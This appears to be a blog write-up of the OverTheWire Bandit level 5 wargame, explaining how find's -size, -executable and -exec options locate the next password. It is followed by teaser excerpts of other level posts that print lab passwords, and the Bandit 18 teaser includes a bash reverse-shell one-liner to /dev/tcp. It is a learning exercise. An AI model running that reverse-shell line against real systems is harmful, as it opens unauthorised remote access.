Skip to main content

Bandit 5 Over The Wire

Lessons learned

Find has a size modifier

Logging into Bandit 5

On a kali vm/ linux machine
Type:

ssh bandit5@bandit.labs.overthewire.org -p 2220 
koReBOKuIDDepwhWk7jZC0RTdopnAYKh

Completing The Challenge

The Goal:

password for next level located in a file somewhere under the inhere directory and has all of the following properties:

  • human-readable
  • 1033 bytes in size
  • not executable

The Solution:

My Solution:

bandit5@bandit:~$ ls inhere 
bandit5@bandit:~$ cd inhere/ 
bandit5@bandit:~/inhere$ find -size 1033c 
./maybehere07/.file2 
bandit5@bandit:~/inhere$ file maybehere07/.file2 
maybehere07/.file2: ASCII text, with very long lines 
bandit5@bandit:~/inhere$ cat maybehere07/.file2 
DXjZPULLxYr17uwoI01bNLQbtFemEgo7

use find -size 1033c t find all files of size 1033 bytes
since there is only one, check that it is human readable and read it

A much better Solution:

find . -type f -size 1033c ! -executable -exec file {} + | grep ASCII

picked from terdon on stackoverflow in the https://unix.stackexchange.com/questions/313442/find-human-readable-files

i added this so that i could find it more easily but also so i could explain it and how it works and also modify it to make things easier. I hope

the . tells find to start in the current directory. not necessarily needed

-type f means regular file, opposed to directories or pipes. not necessarily needed

-size tells find what size to look for, but the c in 1033c is what tells it to actually check the size and not round up

! means negate, so since we have a -executable modifier which is capable of finding executable files, this will remove those instead

-exec file {} + is the part that makes me happiest

the file here is the same file command we have previously used to check file information, in this scenario the find command has the capability of running any command on the results of a find query if you add -exec CMD {} + to the find cmd.

therefore for most things this command could be written as 

find -size 1033c ! -executable -exec file {} + | grep ASCII

but the terdon's is safer and depending on the situation could be faster

Comments

Popular posts from this blog

Bandit 12 Over The Wire

Lessons Learned extracting and decompressing files using the following tools: file, xxd -r, gunzip, bunsip2, and tar -xf Logging in On a kali vm/ linux machine Type: ssh bandit12@bandit.labs.overthewire.org -p 2220  5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu Completing The Challenge The Goal: The password for the next level is stored in the file data.txt , which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work using mkdir. For example: mkdir /tmp/myname123. Then copy the datafile using cp, and rename it using mv (read the manpages!) The Solution:      Revamped:         I decided to write a bash file that solves the problem.                    mkdir /tmp/a_name/                    mv data.txt /tmp/a_name      ...

Bandit 11 Over The Wire

 Lessons Learned using cyberchef for things like rot13 Logging in On a kali vm/ linux machine Type: ssh bandit11@bandit.labs.overthewire.org -p 2220  IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR Completing The Challenge The Goal: The password for the next level is stored in the file data.txt , where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions The Solution: bandit11@bandit:~$ cat data.txt Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh   The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu This is known as rot13 and many free websites exist to solve this issue. CyberChef is a very good site/tool for this and can be downloaded

Bandit 18 Over The Wire

Lessons Learned ssh actions for when bashrc has immediate logout, also has advice on some reverse shell one liners Logging in On a kali vm/ linux machine Type: ssh bandit18@bandit.labs.overthewire.org -p 2220 kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd Completing The Challenge The Goal: The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH. The Solution: kali@kali:~$ ssh bandit18@bandit.labs.overthewire.org -p 2220 'cat ~/readme' This is a OverTheWire game server. More information on http://www.overthewire.org/wargames bandit18@bandit.labs.overthewire.org's password: IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x Ive made reverse shells by doing one liner tcp calls using stuff like the following in the single quotes and by mixing commands using like the following: bash -i > & /dev/tcp/10.0.0.1/8080 0 > & 1